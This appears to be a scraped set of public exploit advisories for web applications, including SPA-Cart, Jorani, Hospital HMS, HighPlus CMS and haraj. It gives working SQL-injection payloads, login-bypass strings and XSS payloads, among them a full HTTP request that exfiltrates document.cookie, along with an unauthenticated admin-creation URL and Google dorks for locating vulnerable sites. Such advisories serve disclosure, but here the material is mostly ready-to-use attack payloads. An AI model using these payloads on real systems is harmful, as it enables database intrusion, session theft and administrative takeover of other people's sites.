<pre><code># Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 20/08/2023<br /># Vendor: SPA-Cart<br /># Vendor Homepage: https://spa-cart.com/<br /># Software Link: https://demo.spa-cart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4548<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /search<br /><br />GET parameter 'filter[brandid]' is vulnerable to SQL Injection<br /><br />https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black<br /><br />---<br />Parameter: filter[brandid] (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 20/08/2023<br /># Vendor: SPA-Cart<br /># Vendor Homepage: https://spa-cart.com/<br /># Software Link: https://demo.spa-cart.com/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4547<br /># CWE: CWE-79 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send to victim a link containing a malicious URL in an email or instant message<br />can perform a wide variety of actions, such as stealing the victim's session token or login credentials<br /><br /><br />Path: /search<br /><br />GET parameter 'filter[brandid]' is vulnerable to XSS<br />GET parameter 'filter[price]' is vulnerable to XSS<br /><br />https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB<br /><br /><br />XSS Payloads:<br /><br />vnxjb"><script>alert(1)</script>bvu51<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Horse Market Sell & Rent Portal Script V1.5.7 xss via file uploads Vulnerability |<br />| # Author : indoushka |<br />| # Telegram : @indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725 | <br />| # Dork : "InfinityMarket MultiPurpose Script is a multi-solution product made with simplicity in mind so you can benefit " |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] singup your user & go to /index.php/frontend/myprofile/en#content<br /><br />[+] choose your file svg and upload it .<br /><br />[+] http://localhost/files/index.svg<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Jorani<br />-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure<br />## Author: nu11secur1ty<br />## Date: 08/27/2023<br />## Vendor: https://jorani.org/<br />## Software: https://demo.jorani.org/session/login<br />## Reference: https://portswigger.net/web-security/cross-site-scripting<br />## Reference: https://portswigger.net/web-security/information-disclosure<br /><br />## Description:<br />The value of the `language request` parameter is copied into a<br />JavaScript string which is encapsulated in double quotation marks. The<br />payload 75943";alert(1)//569 was submitted in the language parameter.<br />This input was echoed unmodified in the application's response.<br />The attacker can modify the token session and he can discover<br />sensitive information for the server.<br /><br />STATUS: HIGH-Vulnerability<br /><br />[+]Exploit:<br />```POST<br />POST /session/login HTTP/1.1<br />Host: demo.jorani.org<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;<br />jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK<br />Origin: http://demo.jorani.org<br />Upgrade-Insecure-Requests: 1<br />Referer: http://demo.jorani.org/session/login<br />Content-Type: application/x-www-form-urlencoded<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 183<br /><br />csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=<br /><br />```<br /><br />[+]Response:<br />```HTTP<br />HTTP/1.1 200 OK<br />date: Sun, 27 Aug 2023 06:03:04 GMT<br />content-type: text/html; charset=UTF-8<br />Content-Length: 681<br />server: Apache<br />x-powered-by: PHP/8.2<br />expires: Thu, 19 Nov 1981 08:52:00 GMT<br />cache-control: no-store, no-cache, must-revalidate<br />pragma: no-cache<br />set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;<br />expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;<br />SameSite=Strict<br />set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;<br />expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;<br />SameSite=Lax<br />last-modified: Sun, 27 Aug 2023 06:03:04 GMT<br />vary: Accept-Encoding<br />cache-control: private, no-cache, no-store, proxy-revalidate,<br />no-transform, must-revalidate<br />pragma: no-cache<br />x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1<br />x-iplb-instance: 27474<br />connection: close<br /><br /><br /><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><br /><br /><h4>A PHP Error was encountered</h4><br /><br /><p>Severity: 8192</p><br /><p>Message: strlen(): Passing null to parameter #1 ($string) of type<br />string is deprecated</p><br /><p>Filename: controllers/Connection.php</p><br /><p>Line Number: 126</p><br /><br /><br /></div><br /><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><br /><br /><h4>A PHP Error was encountered</h4><br /><br /><p>Severity: Warning</p><br /><p>Message: Cannot modify header information - headers already sent<br />by (output started at<br />/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><br /><p>Filename: helpers/url_helper.php</p><br /><p>Line Number: 565</p><br /><br /><br /></div><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)<br /><br />## Time spend:<br />01:35:00<br /><br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HighPlus CMS v0.1.3 Auth By pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://highplus.co.th/Highplus/login/AFMADS001.php | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload : user & pass = ' or 0=0 # <br /><br />[+] http://127.0.0.1wwwhighpluscoth/main/login.html<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : Hospital HMS v2.7 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://apptmedical.com/ | <br />| # Dork : © 2018 HMS. All rights reserved |<br />======================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use Payload : admin & pass = '=' 'or'<br /><br />[+] user login : http://target_site/hms/user-login.php<br /><br />[+] doctor Login : http://target_site/hms/doctor/<br /><br />[+] admin login : http://target_site/hms/admin/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>======================================================================================================================================<br />| # Title : Hospital HMS v2 auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://p30vel.ir | <br />======================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use admin : admin'-- - pass : indoushka<br /><br />[+] http://www127.0.0.1/arvindbijaniyacom/admin/admin_pannel/view_service/index.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hesk Rtl CMS v1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://p30vel.ir |<br />| # Dork : فارسی سازی توسط وحید مجیدی / اسکریپت دات کام |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This vulnerability affects : /Hesk/ajax.php. <br /><br />[+] Attack details :<br /><br /> URI was set to ;997612"():;991161<br /> The input is reflected inside <script> tag between double quotes<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Hasan MWB v1 - XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |<br />| # Vendor : http://sourceforge.net/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt><br /><br />[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : haraj V1.1 Add ADmin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://www.mediafire.com/file/ky3e6rtnb23mddd/free_haraj_v1.1.zip |<br />| # Dork : V1.1 free برمجة وتصميم : سكربت حراج |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /setup/install.php?act=user<br /><br />[+] http://127.0.0.1/adplusgq/setup/install.php?act=user<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>